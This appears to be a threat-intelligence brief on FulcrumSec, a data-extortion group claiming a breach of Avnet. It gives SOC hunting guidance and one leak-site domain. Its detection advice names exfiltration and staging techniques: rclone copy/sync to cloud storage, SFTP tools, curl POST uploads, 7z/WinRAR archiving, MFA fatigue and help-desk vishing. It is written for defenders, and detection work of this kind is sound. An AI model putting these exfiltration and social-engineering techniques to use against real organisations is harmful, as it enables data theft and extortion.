As of late October 2025, FulcrumSec is considered a newly emerged threat. Specific technical indicators (such as file hashes or C2 IP addresses) are not yet available. This article focuses on their confirmed activity and provides actionable hunting guidance based on the TTPs of similar data extortion groups.

Threat Actor Profile: FulcrumSec

• Actor Type: Organized Crime (Data Extortion Group)
• Emerged: September 2025
• Motive: Financial (Profit-oriented, seeks to sell exfiltrated data to a single buyer).
• Modus Operandi: FulcrumSec is a “data extortion-only” group. They do not deploy ransomware. Their model relies on:
  1. Breaching a high-value target.
  2. Conducting large-scale data exfiltration.
  3. Using a dual-platform leak site (clearnet and dark web) and a Telegram channel to extort the victim and attract a buyer.
  4. They have stated an intent to sell data to a single party rather than leaking it publicly, a tactic designed to maximize the data’s value.

Victimology

• Confirmed Victims: One.
• Victim: Avnet (U.S.-based, Fortune 500)
• Victim Scale: Avnet is a global distributor of electronic components with a reported revenue of $22 billion. The successful breach of an enterprise of this size indicates a high level of technical proficiency.
• Impact: FulcrumSec claims to have exfiltrated 1.3 TB of compressed data, including operational data, customer information, and point-of-sale records.

Tactics, Techniques, and Procedures (TTPs) & SOC Hunting Guidance

Specific TTPs for FulcrumSec’s initial access at Avnet have not been publicly disclosed. However, their profile as a “data extortion-only” group is similar to actors like LAPSUS$ and Karakurt. SOCs should hunt for TTPs common to these groups.

1. TTP: Initial Access

Actors like LAPSUS$ have proven that social engineering and identity-based attacks are highly effective. Focus detection on the “human layer.”

• Social Engineering (Vishing/Phishing): The actor may target IT help desks or new employees to gain credentials, reset passwords, or bypass Multi-Factor Authentication (MFA).
  • Hunt Guidance: Monitor for unusual MFA push notifications (MFA fatigue), suspicious password reset requests from help desk staff, and employees reporting vishing calls.
• Credential Compromise: The actor likely uses credentials purchased from initial access brokers (IABs) or harvested from infostealer malware logs.
  • Hunt Guidance: Monitor for logins from non-corporate VPNs, unusual geolocations, or logins with user agents tied to infostealer malware.
• Third-Party/Supply Chain Attack: The actor may target a trusted third-party vendor or contractor who has privileged access to the target network.
  • Hunt Guidance: Strictly audit and monitor all third-party and vendor accounts. Look for activity that deviates from their normal baseline, such as accessing systems or data outside their typical job function.

2. TTP: Data Staging & Exfiltration

To exfiltrate 1.3 TB of data, the actor must use tools capable of large-scale file transfers. These are often legitimate “Living off the Land” (LotL) binaries that blend in with normal administrative traffic.

• Data Staging: Before exfiltration, threat actors compress and consolidate data.
  • Hunt Guidance: Monitor for process creation and command-line arguments for archival tools like 7z.exe or WinRAR.exe. Look for the creation of large (.zip, .rar, .7z) archives in unusual directories (e.g., C:\temp\, C:\ProgramData\).
• Data Exfiltration: This is the key TTP. The actor uses common file transfer and cloud synchronization tools.
  • Hunt Guidance:
    • Rclone: This is the most common tool used by threat actors for mass data exfiltration. Monitor for rclone.exe on endpoints and associated command-line arguments (e.g., rclone copy, rclone sync). Block network traffic to known Rclone destinations (e.g., Mega, Google Drive, Amazon S3) from any server or endpoint that does not have an explicit business need.
    • FileZilla / WinSCP: Monitor for the presence or execution of fzsftp.exe (FileZilla) or WinSCP.exe and any outbound SFTP/FTP traffic to unknown IP addresses.
    • cURL: Monitor for curl.exe (native in Windows) used to upload data via POST requests to unknown domains.

Indicators of Compromise (IOCs)

Due to the newness of this actor, the only publicly known IOCs are related to their extortion infrastructure.

• Domain: fulcrumsec.net (FulcrumSec’s clearnet data leak site)
• Actor Name: FulcrumSec

SOC Recommendations:

1. Block the domain fulcrumsec.net at the firewall and web proxy.
2. Monitor DNS logs for any internal clients attempting to resolve this domain.
3. Add the string “FulcrumSec” to threat intelligence monitoring and log-scraping queries.
4. Prioritize Hunting: Focus on the “Data Staging & Exfiltration” TTPs listed above. Detecting the anomalous use of rclone.exe or other transfer tools is the most likely way to catch a breach from this actor (or a copycat) in progress.